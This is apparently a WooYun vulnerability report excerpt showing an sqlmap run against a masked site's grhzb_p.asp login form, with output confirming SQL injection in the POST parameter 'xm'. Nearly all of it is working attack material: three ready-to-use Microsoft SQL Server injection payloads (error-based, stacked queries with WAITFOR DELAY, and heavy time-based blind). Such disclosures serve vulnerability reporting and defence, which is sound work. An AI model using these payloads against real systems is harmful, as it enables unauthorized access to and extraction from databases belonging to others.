WooYun.org

**.**.**.**/grhzb_p.asp" --data "xm=admin&gh=123456&kl=654321&kl1=&kl2=&zd=wj&B12.x=34&B12.y=22&B12=%C8%B7+%B6%A8

POST parameter 'xm' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 98 HTTP(s) requests:
---
Place: POST
Parameter: xm
    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
    Payload: xm=-2237' OR 8589=CONVERT(INT,(CHAR(58) CHAR(109) CHAR(113) CHAR(99) CHAR(58) (SELECT (CASE WHEN (8589=8589) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(121) CHAR(122) CHAR(119) CHAR(58))) AND 'xCGj'='xCGj&gh=123456&kl=654321&kl1=&kl2=&zd=wj&B12.x=34&B12.y=22&B12=%C8%B7 %B6%A8
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: xm=admin'; WAITFOR DELAY '0:0:5'--&gh=123456&kl=654321&kl1=&kl2=&zd=wj&B12.x=34&B12.y=22&B12=%C8%B7 %B6%A8
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: xm=-8087' OR 3049=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'xOho'='xOho&gh=123456&kl=654321&kl1=&kl2=&zd=wj&B12.x=34&B12.y=22&B12=%C8%B7 %B6%A8
---